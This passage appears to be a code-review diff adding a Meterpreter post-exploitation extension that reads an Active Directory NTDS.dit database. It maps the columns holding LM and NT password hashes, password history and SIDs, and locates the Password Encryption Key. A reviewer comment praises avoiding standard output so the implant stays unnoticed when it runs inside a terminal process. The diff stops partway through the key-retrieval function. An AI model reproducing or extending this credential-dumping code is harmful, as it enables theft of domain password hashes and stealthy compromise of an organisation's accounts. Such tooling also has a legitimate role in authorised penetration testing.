source/extensions/priv/server/ntds_jet.c

```diff
@@ -0,0 +1,432 @@
+*/
+JET_ERR find_first(struct jetState *ntdsState){
+	JET_ERR cursorStatus;
+	cursorStatus = JetMove(ntdsState->jetSession, ntdsState->jetTable, JET_MoveFirst, (JET_GRBIT)NULL);
+	return cursorStatus;
+}
+
+/*!
+* @brief Collect the Column Definitions for all relevant columns in 'datatable'
+* @param ntdsState Pointer to a jetsState struct which contains all the state data for the Jet Instance.
+* @param accountColumns Pointer to an ntdsState struct which will hold all of our column definitions.
+* @returns Indication of sucess or failure.
+*/
+JET_ERR get_column_info(struct jetState *ntdsState, struct ntdsColumns *accountColumns){
+	JET_ERR columnError;
+	struct {
+		char *name;
+		JET_COLUMNDEF *column;
+	}columns[] = {
+		{ "ATTm590045", &accountColumns->accountName },
+		{ "ATTj590126", &accountColumns->accountType },
+		{ "ATTq589983", &accountColumns->accountExpiry },
+		{ "ATTk590689", &accountColumns->encryptionKey },
+		{ "ATTq589876", &accountColumns->lastLogon },
+		{ "ATTk589879", &accountColumns->lmHash },
+		{ "ATTk589984", &accountColumns->lmHistory },
+		{ "ATTj589993", &accountColumns->logonCount },
+		{ "ATTk589914", &accountColumns->ntHash },
+		{ "ATTk589918", &accountColumns->ntHistory },
+		{ "ATTm13", &accountColumns->accountDescription },
+		{ "ATTj589832", &accountColumns->accountControl },
+		{ "ATTq589920", &accountColumns->lastPasswordChange },
+		{ "ATTr589970", &accountColumns->accountSID }
+	};
+	int countColumns = sizeof(columns) / sizeof(columns[0]);
+	for (int i = 0; i < countColumns; i++){
+		columnError = JetGetTableColumnInfo(ntdsState->jetSession, ntdsState->jetTable, columns[i].name, columns[i].column, sizeof(JET_COLUMNDEF), JET_ColInfo);
+		if (columnError != JET_errSuccess){
+			return columnError;
+		}
+	}
+	return JET_errSuccess;
+}
+
+/*!
+* @brief Finds the Password Encryption Key(PEK) record in 'datatable'
+* @param ntdsState Pointer to a jetsState struct which contains all the state data for the Jet Instance.
+* @param accountColumns Pointer to an ntdsState struct which will hold all of our column definitions.
+* @param pekEncrypted Pointer to an encryptedPEK struct to hold our encrypted PEK
+* @returns Indication of sucess or failure.
+*/
+JET_ERR get_PEK(struct jetState *ntdsState, struct ntdsColumns *accountColumns, struct encryptedPEK *pekEncrypted){
+	JET_ERR cursorStatus;
+	JET_ERR readStatus;
+	unsigned char *encryptionKey[76];
+
+	cursorStatus = JetMove(ntdsState->jetSession, ntdsState->jetTable, JET_MoveFirst, (JET_GRBIT)NULL);
+	if (cursorStatus != JET_errSuccess){
+		return cursorStatus;
+	}
+	do{
+		//Attempt to retrieve the Password Encryption Key
+		unsigned long columnSize = 0;
+		readStatus = JetRetrieveColumn(ntdsState->jetSession, ntdsState->jetTable, accountColumns->encryptionKey.columnid, encryptionKey, 76, &columnSize, 0, NULL);
+		if (readStatus == JET_errSuccess){
+			memcpy(pekEncrypted, &encryptionKey, 76);
+			puts("Found the Password Encryption Key");

```

Comment:
We don't want meterpreter ever doing standard IO, since if you migrate to a terminal process, it prints your output. Good catch!